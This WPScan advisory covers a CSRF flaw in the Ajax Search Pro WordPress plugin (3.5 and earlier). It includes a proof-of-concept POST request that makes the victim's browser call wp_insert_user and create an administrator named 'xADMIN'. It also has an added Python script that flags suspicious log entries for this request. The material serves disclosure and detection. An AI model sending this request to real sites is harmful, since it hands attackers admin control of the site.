Ajax Search Pro <= 3.5 - Cross-Site Request Forgery (CSRF) Add User



Proof of Concept
The request below must be issued from the browser of a logged-in WordPress administrator (the CSRF victim), for example by an attacker-controlled page that auto-submits it as a form. The plugin's wpdreams-ajaxinput handler invokes the function named in the wpdreams_callback parameter, here WordPress's own wp_insert_user(), with the remaining submitted fields, and no nonce stops a cross-site page from submitting it. The result is a new administrator with username "xADMIN" and password "xPASS":

POST request to: /wp-admin/admin-ajax.php?page=ajax-search-pro/backend/settings.php&action=wpdreams-ajaxinput

With POST data:
wpdreams_callback=wp_insert_user&user_login=xADMIN&user_pass=xPASS&role=administrator
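A way to look for this being exploited after the fact, as an added example that is not part of the WPScan entry or of the plugin: scan combined-format (Apache/nginx) access logs for POSTs to the admin-ajax.php endpoint carrying the wpdreams-ajaxinput action from the PoC URL, and flag those whose Referer is not the site's own wp-admin. A legitimate settings save comes from the plugin's settings page on the site itself; a forged request arrives with the attacker's origin or, when a referrer policy strips it, with no Referer at all. The hostname blog.example and the log lines are constructed for this example.

```python
"""Detect likely CSRF abuse of the wpdreams-ajaxinput AJAX action in access logs.

Added example, not part of the WPScan entry or the Ajax Search Pro plugin.
Assumptions: combined log format with Referer and User-Agent fields, and a
site hostname of blog.example. Sample log lines are constructed inline.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Combined log format: ip ident user [time] "METHOD PATH PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

SITE_HOST = "blog.example"          # assumed hostname of the WordPress site
VULN_ACTION = "wpdreams-ajaxinput"  # AJAX action from the PoC URL


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_plugin_ajax_call(entry):
    """True for POSTs to admin-ajax.php whose query string carries the plugin's action."""
    if entry["method"] != "POST":
        return False
    url = urlsplit(entry["path"])
    if not url.path.endswith("/wp-admin/admin-ajax.php"):
        return False
    return VULN_ACTION in parse_qs(url.query).get("action", [])


def referer_is_same_site(referer, site_host):
    """A missing ('-' or empty) or foreign Referer means the request was not
    launched from a wp-admin page on the site itself."""
    if referer in ("", "-"):
        return False
    return urlsplit(referer).hostname == site_host


def find_csrf_candidates(lines, site_host=SITE_HOST):
    """Return the plugin AJAX calls that did not originate from the site's own pages."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None or not is_plugin_ajax_call(entry):
            continue
        if not referer_is_same_site(entry["referer"], site_host):
            hits.append({"ip": entry["ip"], "time": entry["time"],
                         "referer": entry["referer"], "status": entry["status"]})
    return hits


# Constructed sample log lines for this example.
SAMPLE_LOG = [
    # legitimate admin saving plugin settings from the dashboard
    '10.0.0.5 - - [18/Mar/2015:10:01:02 +0000] "POST /wp-admin/admin-ajax.php?page=ajax-search-pro/backend/settings.php&action=wpdreams-ajaxinput HTTP/1.1" 200 15 "https://blog.example/wp-admin/admin.php?page=ajax-search-pro/backend/settings.php" "Mozilla/5.0"',
    # same admin's browser, but the request was launched from an attacker page
    '10.0.0.5 - - [18/Mar/2015:10:07:44 +0000] "POST /wp-admin/admin-ajax.php?page=ajax-search-pro/backend/settings.php&action=wpdreams-ajaxinput HTTP/1.1" 200 15 "http://evil.example/lure.html" "Mozilla/5.0"',
    # Referer stripped by a referrer policy: still not provably same-site
    '10.0.0.5 - - [18/Mar/2015:10:09:10 +0000] "POST /wp-admin/admin-ajax.php?action=wpdreams-ajaxinput HTTP/1.1" 200 15 "-" "Mozilla/5.0"',
    # unrelated admin-ajax traffic: different action, and a GET
    '10.0.0.9 - - [18/Mar/2015:10:10:00 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 40 "http://evil.example/" "Mozilla/5.0"',
    '10.0.0.9 - - [18/Mar/2015:10:11:00 +0000] "GET /wp-admin/admin-ajax.php?action=wpdreams-ajaxinput HTTP/1.1" 200 40 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_csrf_candidates(SAMPLE_LOG):
        print(f"{hit['time']} {hit['ip']} referer={hit['referer']!r} status={hit['status']}")
```

The check is keyed to POST because that is what the PoC uses; if you have reason to believe the handler also reads its parameters from GET, drop the method test. The POST body (and so the wpdreams_callback value) is not in an access log, so a hit here is a lead to confirm against the wp_users table, not proof by itself.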

Affects Plugin

Ajax Search Pro, fixed in version 4.0

References

Packet Storm 130955
URL http://web.archive.org/web/20150619084745/http://research.evex.pw/?vuln=9

Classification

Type CSRF
OWASP Top 10 (2013) A8: Cross-Site Request Forgery (CSRF)
CWE CWE-352

Miscellaneous

Submitter A. Samman
Submitter Twitter Evex_1337
Verified No
WPVDB ID 7859

Timeline

Publicly Published 2015-03-18
Added 2015-03-21
Last Updated 2016-12-01

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.